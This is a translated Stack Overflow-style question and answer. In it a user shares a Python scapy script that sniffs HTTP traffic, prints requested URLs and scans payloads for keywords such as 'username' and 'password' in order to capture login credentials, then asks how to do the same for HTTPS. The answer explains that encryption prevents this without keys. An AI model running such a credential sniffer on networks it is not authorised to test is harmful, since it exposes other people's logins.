[英]How do I add support to sniff HTTPS packets here?
到目前为止,我已经能够使用它来过滤和查看 HTTP 请求和数据包。 如何包含额外的支持以类似地查看 HTTPS 数据包?
#!/usr/bin/env python
import scapy.all as scapy
from scapy.layers import http
def sniff(interface):
scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)
def get_url(packet):
return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path
def get_login_info(packet):
if packet.haslayer(scapy.Raw):
load = packet[scapy.Raw].load
keywords = ['username', 'uname', 'user', 'id', 'key', 'email', 'email-id', 'login', 'password', 'pass', "passwd"]
for keyword in keywords:
if keyword in load:
return load
def process_sniffed_packet(packet):
if packet.haslayer(http.HTTPRequest):
url = get_url(packet)
print("[+] HTTP Request >>> " + url)
login_info = get_login_info(packet)
if login_info:
print("\n\nEntered login credentials >>> " + login_info + "\n\n")
sniff("eth0")
简短的回答:你不能。
您可能需要更多地研究 HTTPS。 由于所有内容都已加密,因此如果没有私钥,您将看不到任何内容。 请参阅https://security.stackexchange.com/a/83039
如果您出于调试目的这样做,或者this
他们在您已泄露的密钥上使用 RSA,请查看mitmproxy
。 (我怀疑你正在做任何这些)
我看到你也在关注 Zsecurity 的视频。 你能像讲座中那样从 Bing 捕获 url 吗? 我只能嗅探 http 网址,但在讲座中,他显然能够捕获 https 和 Bing 网址。 (我确信 bing 是 https)。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.